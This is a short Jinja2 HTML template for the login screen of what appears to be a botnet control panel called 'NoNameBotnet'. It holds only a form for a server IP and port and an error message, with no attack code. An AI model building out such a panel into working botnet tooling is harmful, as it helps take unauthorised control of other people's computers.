{% extends "layout.html" %}
{% block title %}Login{% endblock %}
{% block content %}
<table width="100%">
    <tr>
        <th><p class="logo"> NoNameBotnet </p><th>
    </tr>
    <tr>
        <th><form method="POST">
            <input class="access_ip_port" type="text" name="server_ip" placeholder="Server IP">
            <input class="access_ip_port" type="text" name="server_port" placeholder="Port">
            <input type="submit" value="CONNECT"></form></th>
    </tr>
    <tr><th>
            {% if error %}
                <p class="error"> {{ error }} </p>
            {% endif %}
    </th></tr>
</table>
{% endblock %}
